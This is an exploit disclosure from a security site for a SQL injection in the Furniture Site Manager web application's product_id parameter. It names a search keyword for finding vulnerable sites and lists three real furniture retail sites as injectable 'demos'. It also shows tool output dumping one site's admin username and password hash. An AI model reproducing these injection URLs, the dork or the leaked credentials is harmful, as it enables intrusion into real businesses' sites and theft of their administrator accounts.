Furniture Site Manager SQL Injection

2014.08.28
Credit: KnocKout
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

Furniture Site Manager => Remote (product_id) SQL Injection Vulnerability ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockout@e-mail.com.tr (onlymail) [~] HomePage : http://h4x0resec.blogspot.com - http://cyber-warrior.org [~] GREETZ : DaiMon,BARCOD3_UnDeRTaKeR_ [Say]: Grmeyeli naslsnz beyler? xoron hala buralar takip ettiðine eminim. arada bir selam ver ge buralara zletme :) {trdan geri dndk biline...} {THE H4X0RE SECURITY PROJECT continues!! ] (Turkey] ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~Web App. : Furniture Site Manager |~Price : N/A |~Software: https://www.balcom-vetillo.com/furniture-site-manager/ - https://www.furnituresitemanager.com/ |~Vulnerability Style : SQL Injection |~Vulnerability Dir : / |~Keyword : "Powered By Furniture Site Manager" |[~]Date : "27.AG.2014" |[~]Tested on : (L):Kali Linux, Windows XP (R):Apache, PHP 5.4.31, MySQL 5 ~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Demos: http://finestfurniture.com/index.php?route=product/product&path=69&product_id=29880' AAAAAAAAAAAAAAA http://lakeknoxvillefurnitureco.com/index.php?route=product/product&product_id=36398' AAAAAAAAAAAAAAAA http://curlysfurniture.com/index.php?route=product/product&path=68&product_id=7171' AAAAAAAAAAAAAAAA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =============================================================== |{~~~~~~~~ Explotation| SQL Injection~~~~~~~~~~~}| http://$Site/$path/index.php?route=product/product&path=[true ID]&product_id=[true ID]' {SQL Injection} http://$Site/$path/index.php?route=product/product&product_id=[true ID]' {SQL INJECTON} Ex; http://curlysfurniture.com [~] SQL Injecting.. http://curlysfurniture.com/index.php?route=product/product&path=68&product_id=7171' //SQL Command the console ... [20:56:26] [INFO] fetching columns 'user_id=1, password, username' for table 'oc_user' in database 'curlysfurniture' [20:56:26] [INFO] the SQL query used returns 2 entries [20:56:26] [INFO] resumed: username [20:56:26] [INFO] resumed: varchar(20) [20:56:26] [INFO] resumed: password [20:56:26] [INFO] resumed: varchar(40) [20:56:26] [INFO] fetching entries of column(s) 'password, username' for table 'oc_user' in database 'curlysfurniture' [20:56:26] [INFO] the SQL query used returns 1 entries [20:56:26] [INFO] resumed: 749ec92d59aada28cd05de30b8e23aef92b8221c [20:56:26] [INFO] resumed: admin ... ... ... ============================================================= goodluck. greetz TURKEY


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top